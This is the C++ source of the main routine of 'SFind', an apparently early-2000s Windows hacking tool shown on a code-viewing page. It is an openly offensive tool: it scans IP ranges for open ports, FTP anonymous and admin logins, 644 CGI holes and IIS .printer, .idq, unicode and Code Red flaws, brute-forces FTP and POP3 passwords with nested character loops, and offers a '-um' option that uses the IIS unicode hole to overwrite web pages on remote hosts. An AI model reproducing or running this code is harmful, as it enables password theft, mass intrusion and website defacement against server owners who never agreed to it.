📄 unicode.cpp
字号:
/*
=========SFind command line super tools version 1.9==========
========By Sunw 1999-2001. http://sw_sun.myetang.com=========
*/
#include "afxext.h"
#include "winsock.h"
#include "iostream.h"
#include "fstream.h"
#include "unicode.h"
#include "windows.h"
//函数声明
void plango();//进度显示
bool ResetCursor(int y, int x);//设置光标坐标
UINT cracker(LPVOID pass);//ftp、pop3穷举
void checkiisholetype();//检查扫描iis的漏洞类型
void TestThread(int thread=50);//测试当前线程是否以满
void WaitThreadEnd();//等带线程结束
void usage(char* prog);//帮助信息
int passdigit(int type=0);//字典位数,参数0默认表示a-z,1表示0-9,2表示综合
int uhack(char *ip);//修改unicode漏洞主机的web文件
void ver();//版本信息
UINT ftpanonymous(LPVOID ip);//扫描ftp匿名登陆
UINT cgiscan(LPVOID cgistr);//扫描CGI漏洞
UINT iisscan(LPVOID ip);//扫描iis漏洞
UINT pscan(LPVOID port);//端口扫描
//变量定义
HANDLE hstdout=NULL;
WSADATA wsadata;
ofstream myf("sfind.txt",ios::ate);
HANDLE HMUTEX;
int maxthread=0,ok=0,nub=0,portip,ipstart,ipstop,hoststart,hoststop,plan=0,line=5,searchnumber,searchend=0,digit=1;
short portx;
char strch[14];
char * type,* message,* uhackip,*webpath="c:\\inetpub\\wwwroot",sendbuf[100],checkhole[100],iisholemessage[100],*ftpuser;
bool ptop=false,porttype=false,ftpopt=false,connecterror=false,endx=false;
CWinThread* pthread;
int main(int argc,char *argv[])
{
if (argc<2){usage(argv[0]);return -1;}
type=argv[1];
if (WSAStartup(MAKEWORD(1,1),&wsadata)!=0){cout<<"wsatartup error"<<endl;return -1;}
myf<<"COMMAND: ";
for (int argccmp=0;argccmp<argc;argccmp++)
{
myf<<argv[argccmp]<<" ";
}
myf<<endl;
for (;;)
{
//端口扫描
if (stricmp(type,"-p")==0)
{
//自定义端口到端口扫描参数定义1 255 127.0.0.1
if (argc==5&&strlen(argv[2])<7&&strlen(argv[3])<7&&strlen(argv[4])>7)
{ ver();
if (htonl(inet_addr(argv[4]))%256==0||htonl(inet_addr(argv[4]))%256==255)
{cout<<"invalidation address."<<endl;break;}
porttype=true;
nub=1;//此方式只允许一次扫描一台主机
portip=htonl(inet_addr(argv[4]));
ptop=true;
searchnumber=atoi(argv[3])-atoi(argv[2]);
for(short int startport=atoi(argv[2]);startport<=atoi(argv[3])+1;startport++,maxthread++,plan++,searchend++)
{
TestThread();
CWinThread* pthread=AfxBeginThread(pscan,LPVOID(startport));
}
}
//标准端口扫描参数定义
if ((argc==3)&&(strlen(argv[2])>7)||((argc==4)&&strlen(argv[2])>7&&strlen(argv[3])>7))
{ ver();
porttype=true;
if (argc==3) argv[3]=argv[2];
ipstart=inet_addr(argv[2]);
ipstop=inet_addr(argv[3]);
hoststart=ntohl(ipstart);
hoststop=ntohl(ipstop);
searchnumber=hoststop-hoststart;
}
//自定义端口扫描参数5定义3389 127.0.0.1 127.0.0.255
if (((argc==5)&&(strlen(argv[2])<7)&&(strlen(argv[3]))>7&&(strlen(argv[4])>7))||((argc==4)&&(strlen(argv[2])<7)&&(strlen(argv[3])>7)))
{ ver();
porttype=true;
if (argc==4) argv[4]=argv[3];
ipstart=inet_addr(argv[3]);
ipstop=inet_addr(argv[4]);
hoststart=ntohl(ipstart);
hoststop=ntohl(ipstop);
searchnumber=hoststop-hoststart;
}
for (portip=hoststart;hoststart<=hoststop;hoststart++,portip++,nub++,maxthread++,searchend++,plan++)
{
if ((portip%256)==0) {searchnumber--;nub--; maxthread--;continue;} //略过localhost地址
if ((portip%256)==255) {searchnumber--;nub--;maxthread--;continue;} //略过广播地址
//自定义端口扫描3389 127.0.0.1 127.0.0.255
if (((argc==5)&&(strlen(argv[2])<7)&&(strlen(argv[3]))>7&&(strlen(argv[4])>7))||((argc==4)&&(strlen(argv[2])<7)&&(strlen(argv[3])>7)))
{
TestThread();
CWinThread* pthread=AfxBeginThread(pscan,LPVOID(argv[2]));
Sleep(10);//延时读取ip地址
}
//标准端口扫描-p 127.0.0.1 127.0.0.255
if ((argc==3)&&(strlen(argv[2])>7)||((argc==4)&&strlen(argv[2])>7&&strlen(argv[3])>7))
{
for (portx=0;portx<10;portx++,maxthread++)
{
TestThread();
CWinThread* pthread=AfxBeginThread(pscan,LPVOID(ports[portx]));
Sleep(10); //延时读取ip地址
}
maxthread--;
}
}
if(porttype==false) {usage(argv[0]);return -1;}
WaitThreadEnd();
cout<<nub<<" Host search complete."<<" Find "<<ok<<" port(s)!"<<endl;
break;
}
//ftp匿名登陆测试
if (stricmp(type,"-ftp")==0)
{ if ((argc==5&&stricmp(argv[4],"-admin")==0)||(argc==4&&stricmp(argv[3],"-admin")==0)) ftpopt=true;
if (argc==3) argv[3]=argv[2];
if (stricmp(argv[3],"-admin")==0) argv[3]=argv[2];
ver();
ipstart=inet_addr(argv[2]);
ipstop=inet_addr(argv[3]);
hoststart=ntohl(ipstart);
hoststop=ntohl(ipstop);
searchnumber=hoststop-hoststart;
for (portip=hoststart;portip<=hoststop;portip++,nub++,maxthread++,searchend++,plan++)
{
if ((portip%256)==0) {searchnumber--;maxthread--;nub--;continue;} //略过localhost地址
if ((portip%256)==255) {searchnumber--;maxthread--;nub--;continue;} //略过广播地址
TestThread(40);
CWinThread* pthread=AfxBeginThread(ftpanonymous,LPVOID(portip));
}
WaitThreadEnd();
cout<<nub<<" Host search complete."<<" Find "<<ok<<" hole!"<<endl;
break;
}
//穷举测试
if (stricmp(argv[1],"-cracker")==0)
{
if (argc==6&&(stricmp(argv[2],"ftp")==0||stricmp(argv[2],"pop")==0))
{ ver();
uhackip=argv[3];
ftpuser=argv[4];
if (stricmp(argv[2],"ftp")==0)
{ftpopt=true;cout<<"Ftp server: "<<uhackip<<endl;}
else {ftpopt=false;cout<<"Pop3 server: "<<uhackip<<endl;}
cout<<"User name : "<<ftpuser<<endl;
//小写字符穷举循环
if (stricmp(argv[5],"SmallLetter")==0||stricmp(argv[5],"CapitalLetter")==0)
{
char ch[14]={'a','`','`','`','`','`','`','`','`','`','`','`','`','`'};
for(;(int)ch[13]<=122;ch[13]++){if (endx==true) break;
for(;(int)ch[12]<=122;ch[12]++){if (endx==true) break;
for(;(int)ch[11]<=122;ch[11]++){if (endx==true) break;
for(;(int)ch[10]<=122;ch[10]++){if (endx==true) break;
for(;(int)ch[9]<=122;ch[9]++){if (endx==true) break;
for(;(int)ch[8]<=122;ch[8]++){if (endx==true) break;
for(;(int)ch[7]<=122;ch[7]++){if (endx==true) break;
for(;(int)ch[6]<=122;ch[6]++){if (endx==true) break;
for(;(int)ch[5]<=122;ch[5]++){if (endx==true) break;
for(;(int)ch[4]<=122;ch[4]++){if (endx==true) break;
for(;(int)ch[3]<=122;ch[3]++){if (endx==true) break;
for(;(int)ch[2]<=122;ch[2]++){if (endx==true) break;
for(;(int)ch[1]<=122;ch[1]++){if (endx==true) break;
for(;(int)ch[0]<=122;ch[0]++,plan++,maxthread++){if (endx==true) break;
strncpy(strch,ch,digit);
passdigit();
TestThread(100);
if (stricmp(argv[5],"CapitalLetter")==0)
strupr(strch);
CWinThread* pthread=AfxBeginThread(cracker,LPVOID(strch));
Sleep(20);
//if (stricmp(strch,"az")==0)
// endx=true;
}ch[0]='a';}ch[1]='a';}ch[2]='a';}ch[3]='a';}ch[4]='a';}ch[5]='a';}ch[6]='a';}ch[7]='a';}ch[8]='a';}ch[9]='a';}ch[10]='a';}ch[11]='a';}ch[12]='a';}ch[13]='a';
}
//数字穷举测试
if (stricmp(argv[5],"Number")==0)
{
char ch[14]={'0','0','0','0','0','/','/','/','/','/','/','/','/','/'};
for(;(int)ch[13]<=57;ch[13]++){ if (endx==true) break;
for(;(int)ch[12]<=57;ch[12]++){ if (endx==true) break;
for(;(int)ch[11]<=57;ch[11]++){ if (endx==true) break;
for(;(int)ch[10]<=57;ch[10]++){ if (endx==true) break;
for(;(int)ch[9]<=57;ch[9]++){ if (endx==true) break;
for(;(int)ch[8]<=57;ch[8]++){ if (endx==true) break;
for(;(int)ch[7]<=57;ch[7]++){ if (endx==true) break;
for(;(int)ch[6]<=57;ch[6]++){ if (endx==true) break;
for(;(int)ch[5]<=57;ch[5]++){ if (endx==true) break;
for(;(int)ch[4]<=57;ch[4]++){ if (endx==true) break;
for(;(int)ch[3]<=57;ch[3]++){ if (endx==true) break;
for(;(int)ch[2]<=57;ch[2]++){ if (endx==true) break;
for(;(int)ch[1]<=57;ch[1]++){ if (endx==true) break;
for(;(int)ch[0]<=57;ch[0]++,maxthread++){ if (endx==true) break;
strncpy(strch,ch,5);
passdigit(1);
TestThread(100);
CWinThread* pthread=AfxBeginThread(cracker,LPVOID(strch));
//cracker(strch);
//cout<<maxthread;
//Sleep(3000);
}ch[0]='0';}ch[1]='0';}ch[2]='0';}ch[3]='0';}ch[4]='0';}ch[5]='0';}ch[6]='0';}ch[7]='0';}ch[8]='0';}ch[9]='0';}ch[10]='0';}ch[11]='0';}ch[12]='0';}ch[13]='0';
}
if (stricmp(argv[5],"SLAndNum")==0||stricmp(argv[5],"CLAndNum")==0)
{
char ch[14]={'0','/','/','/','/','/','/','/','/','/','/','/','/','/'};
for(;(int)ch[13]<=122;ch[13]++){if ((int)ch[13]==58) ch[13]='a'; if (endx==true) break;
for(;(int)ch[12]<=122;ch[12]++){if ((int)ch[12]==58) ch[12]='a'; if (endx==true) break;
for(;(int)ch[11]<=122;ch[11]++){if ((int)ch[11]==58) ch[11]='a'; if (endx==true) break;
for(;(int)ch[10]<=122;ch[10]++){if ((int)ch[10]==58) ch[10]='a'; if (endx==true) break;
for(;(int)ch[9]<=122;ch[9]++){if ((int)ch[9]==58) ch[9]='a'; if (endx==true) break;
for(;(int)ch[8]<=122;ch[8]++){if ((int)ch[8]==58) ch[8]='a'; if (endx==true) break;
for(;(int)ch[7]<=122;ch[7]++){if ((int)ch[7]==58) ch[7]='a'; if (endx==true) break;
for(;(int)ch[6]<=122;ch[6]++){if ((int)ch[6]==58) ch[6]='a'; if (endx==true) break;
for(;(int)ch[5]<=122;ch[5]++){if ((int)ch[5]==58) ch[5]='a'; if (endx==true) break;
for(;(int)ch[4]<=122;ch[4]++){if ((int)ch[4]==58) ch[4]='a'; if (endx==true) break;
for(;(int)ch[3]<=122;ch[3]++){if ((int)ch[3]==58) ch[3]='a'; if (endx==true) break;
for(;(int)ch[2]<=122;ch[2]++){if ((int)ch[2]==58) ch[2]='a'; if (endx==true) break;
for(;(int)ch[1]<=122;ch[1]++){if ((int)ch[1]==58) ch[1]='a'; if (endx==true) break;
for(;(int)ch[0]<=122;ch[0]++){if ((int)ch[0]==58) ch[0]='a'; if (endx==true) break;
strncpy(strch,ch,digit);
passdigit();
TestThread(100);
if (stricmp(argv[5],"CLAndNum")==0)
strupr(strch);
CWinThread* pthread=AfxBeginThread(cracker,LPVOID(strch));
}ch[0]='0';}ch[1]='0';}ch[2]='0';}ch[3]='0';}ch[4]='0';}ch[5]='0';}ch[6]='0';}ch[7]='0';}ch[8]='0';}ch[9]='0';}ch[10]='0';}ch[11]='0';}ch[12]='0';}ch[13]='0';
}
}
WaitThreadEnd();
break;
}
//cgi漏洞扫描
if (stricmp(type,"-cgi")==0&&argc==3)
{ ver();
nub=1;
uhackip=argv[2];
searchnumber=644;
if (htonl(inet_addr(uhackip))%256==0||htonl(inet_addr(uhackip))%256==255)
{cout<<"invalidation address."<<endl;break;}
for (int i=0;i<644;i++,maxthread++,plan++,searchend++)
{
TestThread();
CWinThread *pthread=AfxBeginThread(cgiscan,LPVOID(cgiholes[i]));
}
WaitThreadEnd();
cout<<nub<<" Host search complete."<<" Find "<<ok<<" hole(s)!"<<endl;
break;
}
//unicode漏洞修改web页面
if (stricmp(type,"-um")==0)
{
if (argc<4||argc>5) {usage(argv[0]);return -1;}
if (argc==5) {webpath=argv[3];message=argv[4];}
if (argc==4) message=argv[3];
ver();
uhack(argv[2]);
break;
}
//iis漏洞扫描
if (stricmp(type,"-idq")==0||stricmp(type,"-pri")==0||stricmp(type,"-uni")==0||stricmp(type,"-codered")==0)
{
checkiisholetype();
if (argc==3) argv[3]=argv[2];
ver();
ipstart=inet_addr(argv[2]);
ipstop=inet_addr(argv[3]);
hoststart=ntohl(ipstart);
hoststop=ntohl(ipstop);
searchnumber=hoststop-hoststart;
for (portip=hoststart;portip<=hoststop;portip++,nub++,maxthread++,plan++,searchend++)
{ if (plan>=3) {plan=-1;}
if ((portip%256)==0) {searchnumber--;maxthread--;nub--;continue;} //略过localhost地址
if ((portip%256)==255) {searchnumber--;maxthread--;nub--;continue;} //略过广播地址
TestThread();
CWinThread* pthread=AfxBeginThread(iisscan,LPVOID(portip));
}
WaitThreadEnd();
cout<<nub<<" Host search complete."<<" Find "<<ok<<" hole!"<<endl;
break;
}
usage(argv[0]);
break;
}
WSACleanup();
myf<<"COMMAND OVER."<<endl<<endl<<endl;
return 0;
}
//帮助提示函数
void usage(char* prog)
{
ver();
cout<<"Usage: "<<prog<<" <Option>"<<" <Parameter>"<<endl;
cout<<endl;
cout<<"<Option>: "<<endl;
cout<<" -p <Port|Port-Port> <IP|IP-IP> Scan port"<<endl;
cout<<" -cgi <IP address> Scan cgi hole"<<endl;
cout<<" -pri <Start IP> <End IP> Scan .printer hole"<<endl;
cout<<" -uni <Start IP> <End IP> Scan unicode hole"<<endl;
cout<<" -idq <Start IP> <End IP> Scan .idq hole"<<endl;
cout<<" -codered <Start IP> <End IP> Scan codered virus host"<<endl;
cout<<" -ftp <Start IP> <End IP> [-admin] Ftp default and admin accounts check"<<endl;
cout<<" -um <IP addr> [Web path] <Message> Modify web files"<<endl;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -